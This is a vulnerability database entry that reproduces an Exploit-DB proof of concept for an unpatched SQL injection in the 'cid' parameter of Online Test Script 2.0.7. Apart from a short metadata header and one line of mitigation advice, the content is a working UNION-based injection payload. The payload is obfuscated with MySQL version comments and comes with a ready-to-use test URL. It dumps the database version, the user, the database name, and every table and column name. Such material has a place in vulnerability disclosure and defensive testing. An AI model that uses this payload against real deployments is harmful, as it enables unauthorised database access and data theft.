Online Test Script 2.0.7 - 'cid' SQL Injection

vendor:

Online Test Script

by:

Borna nematzadeh

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Test Script

Affected Version From: 2.0.7

Affected Version To: 2.0.7

Patch Exists: NO

Related CWE:

CPE: a:phpscriptsmall:online_test_script:2.0.7

Metasploit:

Other Scripts:

Platforms Tested: Web

2018

Online Test Script 2.0.7 – ‘cid’ SQL Injection

The vulnerability allows an attacker to inject sql commands.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented.

Source

Exploit-DB raw data:

# Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/
# Version: 2.0.7
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :

SQLi:

# server/login.php?normal&cid=[SQL]

# Parameter : cid (GET)
#    Type: UNION QUERY
#    Title: Generic UNION query (NULL) - 5 columns
#    payload : /*!00000UNION*/ ALL SELECT
NULL,/*!00000Concat('L0RD',0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL
/*!00000from*/ information_schema.columns where table_schema=schema()%23

Test :
http://server/login.php?normal&cid=-2%20/*!00000UNION*/%20ALL%20SELECT%20NULL,/*!00000Concat(%27L0RD%27,0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL%20/*!00000from*/%20information_schema.columns%20where%20table_schema=schema()%23